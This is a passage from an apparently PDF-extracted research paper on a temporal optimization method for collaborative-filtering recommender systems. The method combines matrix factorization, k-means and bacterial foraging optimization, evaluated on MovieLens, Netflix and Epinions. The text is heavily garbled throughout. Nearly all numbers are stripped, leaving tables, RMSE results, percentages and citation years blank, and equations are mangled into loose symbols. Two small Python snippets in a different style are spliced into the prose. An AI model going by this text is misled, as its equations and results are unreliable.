however, these factorization-based methods do not address temporal issues such as the drift in users’ preferences and the popularity decay of products. this results in low prediction accuracy. one of the most effective approaches for solving the data sparsity issue is mf (koenigstein, dror & koren, ; al-hadi et al., b). a few mf methods use mathematical formulae to combine hidden feedbacks of customers and products. the hidden feedback of customers, products, and baseline properties are incorporated in the formulae. equation ( ) forecasts the lost scores in the ranking matrix. <̂ui=µ+bu+bi+puq t i , ( ) where <̂ui is the predicted value for the sparse score, µ is the global rate of all rating scores, pu is the latent-feedback matrix of customers, qti is the transpose latent-feedback matrix of products, and bu and bi are the observed deviations of customer u and product i, respectively. to anticipate the sparse scores rating, µ, bu, bi, pu, and qti are integrated in numerous mathematical equations such as those in temporal approaches (koren, ; ye & eskenazi, ) and factorization methods (al-hadi et al., ; han et al., ; yuan, zahir & yang, ). for instance, the baseline factor and the distance between rating scores and baseline values of neighbors who supply their rating scores for each product are combined by the neighbors based baseline method (bell & koren, ) as presented in eq. ( ). <̂ui=bu+ ∑ x∈ni simxrxibxi∑ x∈ni simx , ( ) where simx is the similarity rate of customer x with the target customer, n is the set of customers who rate product i, rxi is the rating score provided by user x for item i, and bxi is the baseline value. currently, the temporal recommendation methods are used to suggest products to customers at an appropriate time. these are applied in many prediction techniques to make an accurate forecast. note that time is considered an important factor in making final decisions. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. temporal-based approaches time is a very important factor in learning customers’ interests and tracking products’ popularity decay. the temporal preferences with matrix factorization have been used to develop efficient collaborative-based schemes in addressing the issues of sparsity, drift, and decay. for example, the temporal dynamics approach (koren, ) utilizes the factorization factors, bins (static temporal periods), and global weight to learn the temporal preferences and minimize the overfitted predicted scores. however, it neglects the fact that users’ preferences change over time. hence, the overall weights are not accurate as a result of personalization. the long-term preferences long-term preferences differ from short-term preferences with regards to how they are applied. in a session (i.e., a week, month, or season), the recorded preferences are considered short-term preferences. on the other hand, the baseline factors and the long- term preferences are exploited in the long-term approach (ye & eskenazi, ). this is expressed in eq. ( ), where τs, τe and τui are the first, last and current time that a product i is rated by a customer u, respectively. this approach addresses the drift in customers’ preferences over the long-term but it does not address the popularity decay of products. <̂ui=µ+bu τe−τui τe−τs +bi τui−τs τe−τs +puq t i . 
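as a concrete reading of the first prediction equation above, the sketch below assembles a predicted score from the global mean, the user and item deviations, and the latent vectors. the latent factors here are random placeholders; in practice they would come from a factorization such as svd fitted to the observed ratings.

```python
# sketch: baseline-plus-latent-factor prediction, r_hat(u, i) = mu + b_u + b_i + p_u . q_i
import numpy as np

rng = np.random.default_rng(2)
n_users, n_items, n_factors = 4, 6, 3

mu = 3.6                                      # global mean of all observed rating scores
b_user = rng.normal(0, 0.2, n_users)          # observed deviation of each customer
b_item = rng.normal(0, 0.2, n_items)          # observed deviation of each product
P = rng.normal(0, 0.1, (n_users, n_factors))  # latent feedback matrix of customers
Q = rng.normal(0, 0.1, (n_items, n_factors))  # latent feedback matrix of products

def predict(u, i):
    return mu + b_user[u] + b_item[i] + P[u] @ Q[i]

print("predicted sparse score for user 2, item 5:", round(predict(2, 5), 3))
```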
( ) <̂ui= ( µ+buωu+biωi+puq t i ) +gix [ (buωu) + ∥∥pu∥∥ +(biωi) +∥∥qti ∥∥ ], ( ) where gix is the weight of cluster x for item i that is updated by bfoa, pu and ∥∥pu∥∥ are the latent factor and norm of latent factor of customer u, while qti and ∥∥qti ∥∥ are the latent factor and the norm of latent factor of product i, respectively. moreover, the personal long-term factors are defined by ωu and ωi in eqs. ( ) and ( ), respectively. ωu=exp ( − τue −τ u s τue ) , ( ) ωi=exp ( − τ ie−τ i s τ ie ) , ( ) where τue and τ u s are the last and the first time customer u provided a rating scores, and τ is and τ i e are the first and the last time the group of customers offers scores for product i, respectively. nevertheless, the long temporal approaches (al-hadi et al., b; ye & eskenazi, ) have not addressed issues such as the drift and the popularity decay by considering the short-term preferences. this lowers the prediction performance of the cf technique. the long temporal-based factorization approach (al-hadi et al., b) learns the long-term preferences by integrating genres with factorization features to address sparsity and decay issues. however, this approach falls short of incorporating the drift in customers’ preferences which lowers the prediction accuracy of the cf. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the short-term preferences the temporal dynamics approach (koren, ) is used for predicting missing ratings by integrating the temporal weights with the different factorization factors. this approach minimizes the overfitted predicted scores during the optimization process using a global weight. however, it does not properly characterize personalized feedback. the short-term based latent method (yang et al., ) learns the short-term preferences from the hidden feedback of neighbors’ preferences during a session. however, this approach is not a lasting solution, especially due to long-term, drift, and popularity decay. similarly, the temporal integration approach (ye & eskenazi, ) integrates the long and short preferences with the baseline features to solve the drift issue. this approach is also limited by personalization, understanding the drift in users’ preferences, and items’ popularity decay over time. the short-term based baseline (ye & eskenazi, ) incorporates the baseline values of neighbors during a session with other factorization factors as shown in eq. ( ). <̂ui(t)=bui+ ∑ j∈ν(u,t)[(ruj−buj)$ij] √ |ν(u,t)| +puq t i , ( ) where $ij is the applied weight that decreases the overfitting predicted values, ν(u,t) is the set of products ranked by customer u during time interval t (e.g., the month of july), and∑ j∈ν(u,t)[(ruj−buj)$ij] shows the whole difference between the rating scores by customer u for a set of products during time t and the baseline values. given the soaring ratio in the sparse values in the ranking matrix, the short-term methods are not efficient in learning short-term preferences. products and costumers’ preferences are learned through the short temporal-based factorization method (al-hadi et al., a) to address the drift issue and improve the prediction accuracy of cf. however, product popularity decay is ignored in this approach. short-term preferences are represented using the temporal convergence among the customers. these are exploited for the minimization of overfitting for the predicted rating scores as shown in eq. 
( ), where >xu is the temporal weight that is optimized according to the location of cluster number x that represents the short-term period. however, the prediction function of cf decreases due to the inability of the short-term methods to cover the drift and decay problems during the period. as such, the long and short-term preferences must be integrated to address all the issues in the recommendation system. <̂ui= ( µ+> x ubu+bi+puq t i ) +> x u [ b u+ ∥∥pu∥∥ +b i +∥∥qti ∥∥ ]. ( ) summarily, the existing temporal-based approaches have addressed several limitations of recommender systems such as sparsity (zhang et al., a; idrissi & zellou, ; chu et al., ), drift issue (rabiu et al., ; al-hadi et al., a) and time decay issue (koren, ; ye & eskenazi, ; al-hadi et al., b). each reviewed approach in this article has one or two research gaps, e.g., learning the personalized features, the drift preferences, and the popularity decay. there is currently no approach that considers all these issues (table ). therefore, this work introduces the lto approach for learning the features related to all these issues. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of temporal-based approaches according to the solved issues. temporal-based approach sh or t- t er m lo n g- t er m sp ar si ty d ri ft d ec ay neighbors-based baseline (bell & koren, ) x temporal dynamics (koren, ) x x x x ensemble divide and conquer (al-hadi et al., ) x short-term based latent (yang et al., ) x temporal integration (ye & eskenazi, ) x x x long temporal-based factorization (al-hadi et al., b) x x x short temporal-based factorization (al-hadi et al., a) x x x latent-based temporal optimization approach the lto approach addresses both long and short temporal preferences by using factorization to solve issues of preference drift and popularity decay (alg ). lto applies rmse, cosine, and prediction functions to assess the temporal preference representation. the key empirical setting of the temporal-based factorization method and the proposed solution framework are presented in fig. . bfoa is exploited to capture the preferences of a short duration. by applying k-means, the timestamp convergence deals with short durations in the time matrix. the number of clusters k is recognized based on the number of short durations in the entire period. generally, bacteria cannot track the drift and the time decay perfectly during the short-term without considering the long-term. therefore, the integration of the long and short durations represents the accurate solution for solving the limitations of the drift and the time decay. in fig. , we present an example of how to create the bacteria members by applying the k-means method. in this example, the clusters’ number is assigned for each of the users’ and items’ features. based on the time convergence between the products (columns) and customers (rows), four bacteria members are shown in fig. . the standard bfoa is utilized in the lto process to detect the temporal conducts of customers and products. bfoa members initialize the short-term weights using random values. the lto approach changes these weights throughout the lifecycle of bfoa dynamically based on the positive effect it has on learning stages. the weights of bacteria members >ux and > i y are updated dynamically throughout the learning iteration. this provides a novel tracking of users’ interests in the items. the lto uses eq. 
( ) to reduce the overfitted predicted scores throughout the learning iteration. dui= ( µ+> u xbuωu+> i ybiωi+puq t i ) , ( ) where>ux and> i y indicate the short temporal weights indexed by clusters x and y. user u is indexed by cluster x and item i is indexed by cluster y. the values of>ux and> i y are updated in each iteration according to the positive effect in developing the accuracy prediction of the al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm latent-based temporal optimization data preparation based on personalization ratingmatrix,timematrix ←assign the active user ←data set learning latent and baseline vectors matrixvec ←µ,bu,bi,pu,qti ←baseline,svd←ratingmatrix matrixvec ← ∥∥pu∥∥ ,∥∥qti ∥∥ ←∥∥pu∥∥=√∑mu= (pu) ,∥∥qti ∥∥ ,∥∥qti ∥∥=√∑ni= (qti ) matrixvec ←ωu←ωu=exp ( − τue −τ u s τue ) ←τus ,τ u e ←timematrix matrixvec ←ωi←ωi=exp ( − τ ie−τ i s τ ie ) ←τ is,τ i e ←timematrix assign the number of short durations #d←number of days←total duration of dataset #oneweek←#d/ ,#twoweeks←#d/ ,#onemonth←#d/ #oneseason←#d/ ,#oneyear ←#d/ learning short-term features of users by #onemonth assign the number of clusters based on the number of short duration of users x ←#onemonth temporal index of users←k−means(timematrix,x) [> x ,> x ,...,> x u]←temporal index of users learning short-term features of items by #onemonth assign the number of clusters based on the number of short duration of items y ←#onemonth temporal index of items←k−means(timematrix,y) [> y ,> y ,...,> y i ]←temporal index of items create bacteria combining the temporal features of users and the temporal features of items in one matrix [> x ,> x ,...,> x u,> y ,> y ,...,> y i ]←[> x ,> x ,...,> x u]and[> y ,> y ,...,> y i ] assign the variables of the training process assign rmseoptimum and iteration number initialize random values for s bacteria repeat predicting the sparse scores in ratingmatrix updatedbacteria ←training the weights of short-term [>x ,...,> x u,> y ,...,> y i ] using bfoa dui,fu,gi←equations , , ←updated bacteria, matrixvec, rating matrix rating matrix with predictions←<̂ui=dui+fu+gi cf technique←rating matrix with predictions similarity values←cosine function←cf technique predicted values for items←prediction function← similarity values rmse value←rmse function←predicted values for items and scores of ac- tive user until rmse <=rmseoptimum or complete the iteration loop al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure latent-based temporal optimization framework. full-size doi: . /peerjcs. /fig- figure an example of bacteria members initialization. full-size doi: . /peerjcs. /fig- cf method. the vectors ωu and ωi are the long-temporal independent weights of customer u and product i while bu, bi, pu, qti represent the baseline and factorization variables. the second contribution of lto is tracking users’ drifting interests. this is learned by focusing on the time associated with users’ interests as represented by eq. ( ). fu=> u x [ (buωu) + ∥∥pu∥∥ ], ( ) al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where ∥∥pu∥∥ represents the norm value of user’s latent factor and>ux is updated according to the positive effects of changing users’ interests throughout the learning process. 
the third contribution of lto is tracking the popularity decay of items throughout the learning process by focusing on the time popularity of items as shown in eq. ( ). gi=> i y [ (biωi) + ∥∥qti ∥∥ ], ( ) where ∥∥qti ∥∥ is the norm factorization variable of items and >iy is updated according to the improvement achieved through the learning iteration which affects the baseline values and norm factorization features of items. furthermore, bfoa learns the significance of each short-term period by applying the rmse (which acts as the fitness value). these contributions are combined in eq. ( ) to predict the unknown values within the rating matrix. <̂ui=dui+fu+gi. ( ) the bfoa operates in three stages: chemotaxis, reproduction, and removal and distribution. the first stage involves seeking the closest nutrition source by the bacteria. this is accomplished by swimming or tumbling or alternating between swimming and tumbling to change direction during the generation. in this process, the flagella of the bacteria make clockwise rotations to choose another path so that rich nutrients in the surrounding can be obtained. the tumbling stage is expressed in eq. ( ). τ i(j+ ,k,l)=τ i(j,k,l)+ci+ θ√ θti θi , ( ) where τ is the short-term features of one bacterium, the variables i, j, k and l symbolize i-th bacterium at j-th chemotactic, k-th reproduction and l-th elimination and dispersal steps. ci is the walk length in an irregular direction, i is a random value oncterium number i at j-th chemotactic, k-th reproduction and [- , ], and √ ti i is the unit walk in the irregular direction. swimming follows tumbling whenever the flagella of bacteria make the counterclockwise rotation to move in a particular direction. the bacteria continue swimming in the same direction if the nutrients are rich and the alternation between tumbling and swimming is repeated until the chemotactic stage is complete. the swarming function utilizes a sensor to provide signals in a nutrient-rich environment. when the signal indicates a poor nutrient or a dangerous location, the bacteria shift from the center to the outward direction with a moving ring of the members. if the nutrient has a high level of succinate, the bacteria subsequently neglect aspartate attractant and concentrate in groups. the bacteria provide an attraction signal for the all members so that they swim together. the bacteria move in a concentric pattern with a high density. the outward movement of the ring and the native releases of attractant constitute the spatial order (kim & abraham, ). the swarming stage is represented mathematically as shown in eq. ( ). τ i(j+ ,k,l)= s∑ i= −dattr exp(wattrβ)+ s∑ i= −hrepexp(wrepβ), ( ) al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where s denotes the number of bacteria and β is the summation of short-term features that can be learned by the members of bacteria i as shown in eq. ( ). the attractant depth dattr denotes the magnitude of excretion by a cell, attractant width wattr denotes how the chemical cohesion signal spreads, repellent height hrep and width wrep determine the size of optimization space where the cell is related to the dispersal of chemical signal. β= p∑ m= (τm−τ i m) , ( ) where p denotes the number of short-term features, τm denotes the short-term feature number m learned during the chemotaxis process whileτ im is the short-term feature number m learned during the chemotaxis process by bacteria i. 
in the reproduction stage, the health of bacteria is calculated according to the fitness value of each bacterium. the bacteria values are then sorted in an ascending order in the array. the fitness value provided by rmse is extracted from the optimization area in the recommendation system (that is based on collaborative filtering). the lower half bacteria with poor foraging die and the upper half bacteria (having better foraging) are copied into two parts. each part has the same values al-hadi et al. ( a). this procedure keeps the bacterial population constant. the bacterial health can be calculated using eq. ( ). j ihealth= nc+ ∑ j= j(i,j,k,l), ( ) where j ihealth is the healthy score of the short-term preference that can be learned by bacteria i, the number of chemotactic, reproduction and removal steps are j, k and l, respectively. provision for the possibility of the ever-changing status of a few bacteria is carried out in the third step (removal and distribution). here, the rise order involves the arrangement and generation of the random vector. the bacteria are organized based on their health values. moreover, the randomly generated locations are used to change the locations of the bacteria in the optimization domain. these locations are recognized as the prominent available locations. after the generation, the best result in each repetition is approved as the final (correct) result. in this work, the bfoa is integrated with the k-means clustering algorithm and matrix factorization approach. the k-means acts as a clustering algorithm used to control the big optimization space based on members’ personal features. it is used to reduce the large number of members to a small number of clusters. these clusters are then controlled using a weight for each cluster to control the optimization domain. applying the natural choice in the course of repeating generations, the bfoa decreases the number of poor foraging members and increases the number of rich foraging strategies (al-hadi, hashim & shamsuddin, ). after several generations, the poor foraging members are removed or transformed to skilled members. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experimental settings the cf technique is used to predict the interest of an active user. this takes into account the calculated similarity values between the rating scores of common users (neighbours) and the active user. however, sparse rating scores in the rating matrix negatively affect the prediction accuracy of the cf technique. thus, this research work aims to improve the prediction of sparse rating scores in the rating matrix of each active user. the data sparsity is an important issue which this research aims. the factorization approaches (including temporal-based factorization) are used to predict missing rating scores in the rating matrix which improves the prediction accuracy of cf. the percentage accuracy can be measured using rmse function where the lower values of rmse refers to the accurate predicted values for the missing rating score in the rating matrix and also refers to the heights accuracy prediction of the recommendation list of items that can provided to the active user. datasets to demonstrate the performance of lto, three real-world datasets are used: movielens, netflix, and epinions. several experimental studies have utilized movielens [ ], netflix prize [ ], and epinions [ ] to predict the performances of recommendation systems. 
a brief description of the three datasets is given in table . the customers of these datasets assign a rating score from to to the movie or product, where to indicate an unliked product and to indicate a liked product. in the concluding experiments, the sparsity level of each dataset is considered to show its effect on the prediction performance of these datasets. the sparsity level is computed by eq. ( ) (abdelwahab et al., ), where #rating is the score provided by users from to and #total is the product of #customers and #products. sparsitylevel = − #rating #total . ( ) normalization data normalization is used in data transformation to reprocess the data with the aim of enhancing the precision and effectiveness of mining methods and distance calculations (al-hadi et al., ). in recommender systems, the scores of customers for products are within – . however, this range may result in low prediction accuracy. thus, the rating scores are normalized to a range ( – ) to reduce the prediction error. table shows the values of the original scores and the normalized scores. k-means and bfoa setting table shows the number of clusters for the k-means clustering method and the short-term periods for the three datasets. the movielens contains data for four periods (i.e., one day, one week, two weeks, and one month) while netflix contains an additional two periods (i.e., one season and one year). for instance, the entire period of netflix is about days which can be divided by days to get seasons. here, the cluster number (i.e., ) is assigned to represent the users’ activities throughout the temporal convergence of seasons. the k-means algorithm will divide the activities of users in the time matrix into al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table experimental datasets. movielens netflix prize epinions trustlet #customers , , #products , , , #rating , , , , sparsity level . . . date – – #periods months years months temporal vector #seconds #days #months products movie movie product table the normalization of the rating scores. type range rating scores original [ – ] normalized [ – ] . . . . table the k-means clustering method and short-term periods for different datasets. datasets # days periods # clusters ( k) success clustering movielens one month x two weeks x one week x one day epinions one month x two weeks x one week netflix one year x one season x one month x two weeks clusters. similarly, the interest-time for items in the time matrix will be divided into clusters. however, when the number of clusters is greater than the number of customers in some rating matrices (e.g., two weeks period), netflix will not be appropriate for grouping by the k-means algorithm. the periods of one month and one season are applied by epinions. the one-week period is not considered as it is not suitable for epinions temporal feature (al-hadi et al., b). the period of two weeks by netflix is inappropriate for k-means clustering algorithm (al-hadi et al., a). therefore, in the netflix dataset, three temporal periods are used (i.e., one year, one month, and one season). the bfoa factors and their values are determined according to the proper empirical execution of the lto approach in table . in addition, a value is selected from the numbers of clusters using the p parameter as demonstrated in table . al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the parameters values of bfoa. 
parameters no parameters no no. of bacteria groups s elimination-dispersal l the length of a swim wrep run length unit ci . wattr . no. of iteration probability of elimination-dispersal . optimum rmse . dattr . no. of chemotactic steps j hrep . reproduction steps k rmse value reduction the lto approach extracts the short-term features by deploying bfoa which uses the temporal convergence in the time matrix of a short duration. for instance, the number of months in each active user’s time matrix is considered to divide the time matrix into k-weighted clusters. the bfoa trains the clusters’ weights to reduce the overfitted predicted scores according to the smallest rmse. the weights of a short duration are optimized based on the positive effects on the factorization factors. this way, the prediction accuracy of the cf technique is achieved. the factorization factors are extracted from a rating matrix and fixed values are provided for all iterations of the optimization process. the swarming action of bacteria provides sensor values that are integrated with rmse to guide the members of bacteria into the direction of the rich nutrient or to avoid the detrimental area. short-term periods are determined from the time of all preferences in each experimental dataset and their effects are shown under two kinds of scoring scales. table is an example of drift learning based on overfitting values minimization. in this example, each row contains the active user’s id and the rmse values for iterations. the lowest rmse value is selected by ensemble selection and saved in the last column of this table. the optimum temporal weights are also saved according to the selected rmse value. average rmse values for iterations (column by column) are shown in the last row. the value in the last cell is the lowest average rmse value of the test-set members ( . ). this will be used for comparing the prediction performance of lto with the benchmark schemes. the lto learns the temporal weight of each user using the personality activation of the users who rated the set of items during the long-term. similarly, the lto learns the temporal weight of each item based on the personality activation of the set of users who rated the item during the long-term. the temporal weights of the long duration are incorporated in the baseline model to determine the interest of customers and the popularity of products. in addition, the short duration weights are learned by the lto approach. this is achieved using minimized overfitting. lto learns the drift and time decay features during the optimization process. this lto approach improves the performance of the cf technique throughout the iteration loop by learning the accurate predicted sparse rating score values in the rating matrix which reducing the rmse values. in the next section, the effect of lto approach in learning the temporal features will be examined under the scoring of [ – ] and [ – ]. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table an example of how lto reduces rmse values in movielens under scoring [ - ]. user iteration number min rmse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . avg. rmse . . . . . . . . . . . table average personal vectors of the test-set matrices. test-set movielens netflix epinions number of the rating matrices avg. no. of customers avg. no. of products avg. no. of rating scores > avg. no. of total rating scores >= avg. 
percentage of sparsitylevel . % . % . % experimental results this section discusses the performances of the benchmark and the proposed approaches for improving the cf prediction performance technique under two scoring scales which are [ – ] and [ – ]. the efficacy of lto in resolving the decay and drift issues by reducing the rmse values are also discussed. table shows the personal vectors of the test-set matrices that can impact the experimental results. there are rating matrices for movielens which are selected by the sequence , , , ....., for the test-set. each matrix in the test-set has different numbers of rows and columns. the sparsity levels are compared with other matrices to provide unique results for each rating matrix. the average numbers of these matrices and their factors are used for performance evaluation in the experiments. lto approach under the scoring [ – ] the lto approach is applied to five short-term periods (which are a week, two weeks, a month, and a year) according to the tested dataset under the rating scale [ – ]. figures – demonstrate the prediction accuracy while performing the iterations on the datasets. figure shows that the two weeks period in movielens has a higher prediction accuracy during – iterations compared to one week and one month. users’ activities during the long and short duration preferences are best learned within the two weeks period. this makes it an accurate short-term preference. in fig. , the period of one month in the epinions dataset has a higher prediction accuracy during iterations to compared to the period of one season. here, one month is an accurate short-term period. this period has the best short and long-term performances compared to one season. one year period in netflix provides a greater al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for movielens. full-size doi: . /peerjcs. /fig- prediction performance from iterations to in fig. . across iterations to , the period of one year is more precise than one month but less than the period of one season. the temporal attitudes are learned by the lto approach over iterations. this helps to achieve precise predictions by optimizing the temporal weights of each duration. the periods of netflix are years, seasons or months. experimental results show that lto, in one season, achieved the highest prediction performance compared to its predicted performance using the year and month periods. this is because the duration of a season is an intermediate between a month and a year. moreover, various customers’ activities are performed therein. lto approach under the scoring [ – ] this subsection demonstrates the normalizing effect on the performance of lto for reducing the rmse under the scoring [ - ]. figures , and track the effects of the temporal vectors in improving the prediction accuracy of the cf using the lto approach. figure indicates that the rmse of movielens for a week is better than that of a month under the rating scale [ – ]. additionally, the rmse during the period of two weeks is the best compared to those of a week and a month. this emphasizes the significance of the two-week period in learning the drift of customers’ interests and products’ popularity time decay. figure shows the prediction accuracy using epinions, here, the period of one month has a significant effect on reducing the rmse in iterations to compared to the effect of one season. 
in figure , the effect of a season using netflix is equivalent to the effect of a year but more than the effect of a month during iterations to . iterations to has the al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for epinions. full-size doi: . /peerjcs. /fig- figure lto prediction accuracy improvement of cf for netflix. full-size doi: . /peerjcs. /fig- sharpest accuracy prediction in the season compared to the period of one year and one month. figures – show the potential of bfoa in learning the temporal features by swarming in the dimensional time-space. the effects of the equivalent time periods show that the customers’ interests and the products’ popularity changed during these periods. the proposed approach will be evaluated by the current factorization and temporal approaches in the next subsection. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for movielens. full-size doi: . /peerjcs. /fig- figure lto improves accuracy prediction of cf for epinions. full-size doi: . /peerjcs. /fig- comparison of the performances of cf, mf, and temporal-based approaches in this subsection, the lto approach is evaluated by comparing its effectiveness in reducing rmse values with other benchmark approaches. both lto and the benchmarks are used to predict the sparse scores as they all lower the rmse values. note that the lower the rmse value, the higher the prediction accuracy of the cf approach. in table , seven approaches are implemented to benchmark the prediction performance of lto. the improvement in the prediction performance of the cf technique is represented by two scoring scales: [ – ] al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lto prediction accuracy improvement of cf for epinions. full-size doi: . /peerjcs. /fig- and [ – ]. first, the scores from to are provided by the users of the three experimental datasets, and the benchmarks are categorized into three parts. the first part contains the prediction accuracy of the cf technique by rmse for the rating matrix of the active user without predicting the sparse rating scores. the second part contains the prediction accuracy of the cf by two factorization approaches which are neighbour-based baseline (bell & koren, ) and the ensemble divide and conquer (al-hadi et al., ). these approaches are used to solve the sparsity issue and as well learn the accurate factorization features. from the evaluations, it is observed that the prediction performance of ensemble divide and conquer is better than that of the cf and the neighbours-based baseline approach. however, the approaches in the second category have weaknesses in learning the overfitted predicted scores and temporal issues (such as drift and decay). for the third category, five temporal approaches are used to solve five issues i.e., sparsity, accurately learning latent features, overfitting, drift, and decay. the temporal dynamics (koren, ) has a good prediction performance in solving these issues but it has a weakness in learning the personalized features using the equaled time slices. 
temporal integration using netflix performs better compared to temporal dynamics and short-term based latent approach. however, temporal integration has a weakness with respect to drift and decay. short temporal-based factorization (al-hadi et al., a) addresses all issues except popularity decay. it improves the prediction performance of the cf technique when compared to the above approaches using movielens and netflix. the performance of the short temporal-based factorization approach is lower than that of the ensemble divide and conquer approach using the epinions dataset because the recorded timestamp factors are registered using the number of months only (which represent weak temporal al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the rmse of several prediction approaches using three datasets. approach scoring [ – ] scoring [ – ] movielens epinions netflix movielens epinions netflix cf . . . . . . neighbors based baseline (bell & koren, ) . . . . . . ensemble divide and conquer (al-hadi et al., ) . . . . . . temporal dynamics (koren, ) . . . . . . short-term based latent (yang et al., ) . . . . . . temporal integration (ye & eskenazi, ) . . . . . . short termporal based factorization (al-hadi et al., a) . . . . . . lto . . . . . . features). distinctively, the lto approach addresses all issues including the limitations in the benchmark schemes. it improves the prediction performance of the cf technique through a perfect combination of various factorization and temporal features. it also tracks the drift of users and the decay of items throughout the learning process. table shows that lto exhibits superior prediction performance when compared to all benchmarks. the normalization process for rating scores has reduced the rmse values by almost % due to the percentage difference between the rating scores [ – ] and [ – ]. for example, the percentage difference of lto approach in movielens is calculated using eq. ( ). percentage difference= − scoring scale −scoring scale scoring scale , ( ) where scoring scale is from to and scoring scale is from to . the percentage difference between . and . is . %. figure indicates the high prediction accuracy achieved by the lto approach for the three datasets when compared with the benchmark methods. additionally, the graphs show the positive impact of the normalization in reducing the rmse by around %. comparison of the output prediction scores of cf and lto the cf technique utilizes the similarity function to calculate the similarity between the active user and the common users or neighbors. in the second stage, cf utilizes the prediction function according to the similarity values to recommend items to the active user. however, cf’s predicted scores are not accurate because of the sparsity values in the rating matrix. this is solved using the lto approach. table is an example showing the improved accuracy of the predicted scores achieved by the lto approach. in this example, the short duration is one year. active users rate items from to , where and indicate unlike items while , , and indicate the liked items. the cf predicts rating scores from . to . . this provides the active users with recommended and unrecommended items (denoted by r and n, respectively in table ). on the other hand, the lto approach predicts rating scores from . to . which provides more accurate prediction compared to the cf. 
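two small computations sit behind this comparison and can be sketched directly; the numbers are illustrative, the reduction is measured relative to the rmse on the original scale, and the like-threshold of 3 follows the convention above that the lower two scores mark unliked items.

```python
def rmse_reduction_percent(rmse_original_scale, rmse_normalized_scale):
    """Relative RMSE reduction obtained after normalising the rating scores,
    expressed as a percentage of the RMSE measured on the original scale."""
    return 100.0 * (rmse_original_scale - rmse_normalized_scale) / rmse_original_scale

def label_items(predicted_scores, like_threshold=3.0):
    """Turn predicted scores into the R/N labels of the feedback table:
    scores at or above the threshold are recommended ('R'), the rest are not ('N')."""
    return ['R' if score >= like_threshold else 'N' for score in predicted_scores]

print(rmse_reduction_percent(0.95, 0.76))    # 20.0 (a roughly one-fifth reduction)
print(label_items([2.4, 3.7, 4.9, 1.2]))     # ['N', 'R', 'R', 'N']
```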
figure visualizes the output in table and indicates the high prediction performance of the lto approach. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the normalisation effects on the prediction accuracy of cf. lto provides the highest accuracy prediction for the cf under scoring [ – ]. full-size doi: . /peerjcs. /fig- table feedback prediction scores by cf and lto approaches. items i i i i i i i i i i i i i i active user cf . . . . . . . . . . . . . . r r r r r r r r r n r n r r lto . . . . . . . . . . . . n r n n n r n n r n r r r r figure feedback prediction scores by cf and lto approaches. full-size doi: . /peerjcs. /fig- al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. conclusion the cf performance is affected by several factors including changes in the customer’s taste, time decay in the popularity of products, data sparsity, and the overfitting in the predicted rating scores. prior research has attempted to enhance the cf’s prediction function by integrating the long and short-term preferences via the temporal interaction method (ye & eskenazi, ) with the factorization factors. however, the achievement is low. the goal of the long temporal-based factorization approach (al-hadi et al., b) is to solve the popularity decay problem and understand the drifting taste of clients over the long-term. on the other hand, the main focus of the short temporal-based factorization approach is to understand the behaviors of customers and solve the drift issue in the short-term. nonetheless, there are several limitations associated with predicting popularity decay issues as well as the drift in customers’ preferences over time. to address these problems, the lto approach presented in this paper integrates both short and long-term preferences. it utilizes the k-means and bfoa method which derived the fitness value by combining the signal and rmse values. the swarming function represents the preferences of the short-term based on the sensitivity of bacteria to rich nutrients or dangerous signals. according to the empirical findings, a higher prediction precision is achieved by the lto approach compared to the benchmark approaches. this is attributed to the temporal-based factorization approach and its ability to enhance the accuracy of the cf technique by understanding the temporal behaviors in both long and short preferences. possible extensions of this work include integrating the lto approach with other factorization features such as neighbors’ latent feedbacks. this would contribute to addressing issues such as the cold start when recommending new items to active users. besides, the genre’s features of movies can be integrated with the factors that are utilized by lto approach for the purpose of addressing challenges of new items by the movielens and yahoo! music datasets. additional information and declaration funding this publication is funded by the asian office of airforce research and development (aoard) through a project on deep recurrent q learning for recommendation system. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. 
